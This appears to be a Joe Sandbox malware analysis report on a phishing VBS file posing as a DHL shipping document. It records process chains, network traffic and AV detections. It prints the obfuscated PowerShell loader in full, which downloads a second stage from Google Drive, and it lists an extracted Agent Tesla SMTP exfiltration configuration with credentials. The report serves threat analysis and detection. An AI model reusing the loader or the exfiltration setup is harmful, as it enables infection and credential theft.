turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,elo

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Found malware configuration
            Source: conhost.exe.6720.2.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
            Multi AV Scanner detection for submitted file
            Source: DHL Shipping doc.vbsVirustotal: Detection: 14%Perma Link
            Source: unknownHTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2122178024.0000000008500000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2116646966.0000000007667000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2116646966.00000000076E2000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.4:49741 -> 114.142.162.17:26
            Source: Joe Sandbox ViewIP Address: 114.142.162.17 114.142.162.17
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU SERVERMULE-AS-APNimbus2PtyLtdAU
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: powershell.exe, 00000001.00000002.2329475776.000001D971C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mUy
            Source: powershell.exe, 00000004.00000002.2122178024.0000000008510000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000001.00000002.2198052956.000001D959B52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.cash4cars.nz
            Source: powershell.exe, 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0R
            Source: wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: powershell.exe, 00000001.00000002.2198052956.000001D959601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2108163000.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: wab.exe, 00000009.00000002.2941957130.0000000024531000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2941957130.0000000024542000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: powershell.exe, 00000001.00000002.2198052956.000001D959601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.2108163000.0000000004C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
            Source: wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: wab.exe, 00000009.00000002.2940602617.0000000022401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: wab.exe, 00000009.00000002.2928711448.0000000006AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: wab.exe, 00000009.00000002.2928711448.0000000006B01000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928670685.0000000006A30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g
            Source: powershell.exe, 00000001.00000002.2198052956.000001D959829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9P
            Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9XR
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2928711448.0000000006B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2106027892.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download
            Source: wab.exe, 00000009.00000002.2928711448.0000000006B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=downloadQ
            Source: wab.exe, 00000009.00000002.2928711448.0000000006B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=downloadU
            Source: wab.exe, 00000009.00000003.2105897287.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2089818579.0000000006B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=downloade1
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download
            Source: powershell.exe, 00000004.00000002.2108163000.0000000004D78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2116646966.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95A17A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2112300960.0000000005C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000001.00000002.2198052956.000001D95B828000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B82C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D959B3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2198052956.000001D95B805000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084015727.0000000006B42000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2084174629.0000000006B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_6692.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_5932.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6692, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5932, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7520
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7520
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7520Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7520Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
